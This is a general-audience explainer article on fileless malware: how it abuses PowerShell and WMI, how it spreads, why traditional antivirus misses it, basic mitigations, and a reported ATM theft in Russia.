Over the years, we’ve all become familiar with malware and the damage that it can do, whether it manifests itself as a virus, worm, spyware, ransomware or Trojan. Our general understanding of malware is that it works by installing software on a computer without our consent.
However,arelatively new variant appears to turn this concept on its head. As the name suggests, ‘fileless’ malware infiltrates a PC without any software being written to the hard drive, making it the most sinister, well-disguised threat that we’ve ever seen.
How does Fileless Malware work?
Fileless malware uses tools that are already built into Windows, which means an attack appears, to all intents and purposes, likeanormally running process.
In particular, it tends to target Microsoft PowerShell and Windows Management Instruction (WMI), taking over the service before loading software or getting it to execute commands that will launch an attack. There is no actualm alware file involved, nor is there any contact with the host PC’s hard drive.
Instead, the fileless malware is written directly to the PC’s memory (RAM) and run from there.And there it remains, causing problems, until the PC is rebooted. Worst of all, you
probably won’t have a clue that anything has happened until it’s too late.
How does fileless malware get on my computer?
Fileless malware could be disguised as a Word or Excel file containing a link that, when clicked, will deliver malware into your PC’s memory, infecting it via a PowerShell script.
Alternatively, it could be hosted onawebsite that looks for vulnerabilities in a Flash plugin, allowing it to run in the memory reserved for your browser.
Fileless malware is known to be spread by phishing emails, malicious downloads and malvertising. The key thing to remember is that no malicious program is actually installed on your hard drive, which is what makes it such a tricky and insidious problem.
Why are PowerShell and WMI targeted?
Aside from being ubiquitous, these tools allow access to the heart of a computer.
PowerShell, for example, is an advanced scripting engine widely used to administer machines running Windows, which means an attacker can access Windows features by running malicious script in the memory.
Read more in detail Getting Started with Windows PowerShell
It also provides full access to Microsoft COM (Component Object Model) and WMI, where software can be installed and updated, and where the operating system can be queried. If
the fileless malware wants to delete, copy or execute files, it can do so via the WMI.
Won’t my antivirus software detect it?
Unfortunately, no. Traditional antimalware and antivirus tools are totally ineffective against fileless malware because they are simply not set up to deal with this kind of intrusion.
Instead, they are programmed to act when they detect a malicious file is being written to
a hard drive–the idea being that the files are compared to the security software’s library of known threats. But that isn’t happening in this instance, so the fileless malware is able to get through entirely undetected.
What’s more, the commands and applications being used are native to Windows and are, in other circumstances, legitimately used for administrative tasks.
If nothing else, it shows how sophisticated this malware strain actually is, which only makes it more worrying.
How can I combat the threat?
Perhaps the most effective method is to disable PowerShell, which you can do by opening the Control Panel (search for it from the taskbar’s search box) and selecting ‘Programs and Features’. Click the link ‘Turn Windows features on or off’ and untick the box next to Windows PowerShell.
You should also ensure that Windows and other programs are regularly updated, and keep a keen eye out for unusual behaviour, rebooting your machine if you suspect anything odd is happening. For most ordinary users, this should suffice.
So why doesn’t everyone disable PowerShell?
It’s not a problem for Windows Home users but PowerShell and WMI are crucial for the smooth running of many company IT departments, and preventing their use could have an adverse effect on productivity.
To that end, if businesses decided to ban PowerShell, it would severely disrupt many day-to-day tasks carried out by IT professionals. Besides, PowerShell isn’t the only vulnerability – Microsoft Word macros can also be leveraged, browsers can be made to run malicious code and Windows processes such as Rundll32 and VBScript Mshta also offer a point of access.
How big a problem is Fileless malware, though?
According to a report from security company SentinelOne ( Find here ), the first six months of this year saw a 94% rise in fileless malware attacks – and it’s continuing to get worse.
In June 2018, there werearecord 5.2 PowerShell attacks per 1,000 PCs, up from 2.5
attacks in May. It’s only a matter of time before fileless malware grows from something that primarily affects businesses to a blight that impacts us all.
Is anything being done about it?
Security experts are looking at the best ways to tackle the problem but it isn’t easy. Aside from disabling PowerShell and WMI (with all its associated problems), there’sasuggestion that IT departments should consider using software to review security logs in the hope of spotting high levels of data leaving the network – but this could be closing the proverbial barn door after the horse has bolted.
More encouraging is the potential use of artificial intelligence and machine learning to instantly spot particular kinds of activity, so the malware can be stopped dead in its tracks.
That would certainly be preferable to having security professionals review logs manually for signs of suspicious behaviour. If you want to see how hard it is to solveafileless
malware attack, complete the quiz on McAfee’s website .
Can the malware spread easily?
Yes, it can. Using WMI, a hacker is able to spread the threat to other PCs on a network by getting those computers to run malicious code that doesn’t get saved to the hard drive.
It can then become a race against time to sort out the issue and check the damage. Worse, fileles smalware is becoming so sophisticatedt hat some strains placeascript in the
Registry, which reinstates malicious code after an infected computer is powered down and rebooted.
Other strains of the malware are developing techniques using ransomware and data encryption which, if successful, could prove devastating.
Scary. However, I haveaMac so am I ok?
As it stands, you are – for now, at least. Currently, fileless malware is only attacking Windows, but that’s because more computers are running this operating system, so hackers are paying more attention to it.
This doesn’t mean Apple Macs can’t be affected, it’s simply a case of the hackers not getting around to writing the attacks. As soon as they work out a suitable equivalent to
PowerShell on Mac OS, you can bet it’ll be exploited.
HOW IS FILELESS MALWARE BEING USED?
Fileless malware attacks don’t often hit the headlines, but that’s mainly because
it’s a relatively recent phenomenon. Last April, however, it was reported that a hacker had targeted at least eight cash machines in Russia, getting away with a jaw-dropping $800,000 (about £610,000).
The theft appeared to baffle those monitoring the CCTV footage because the hacker seemed able to withdraw lots of cash without even touching the ATM.
The mystery was solved when researchers found a log file pointing to a fileless attack. There was no sign of any malware files on the ATM or the bank networks.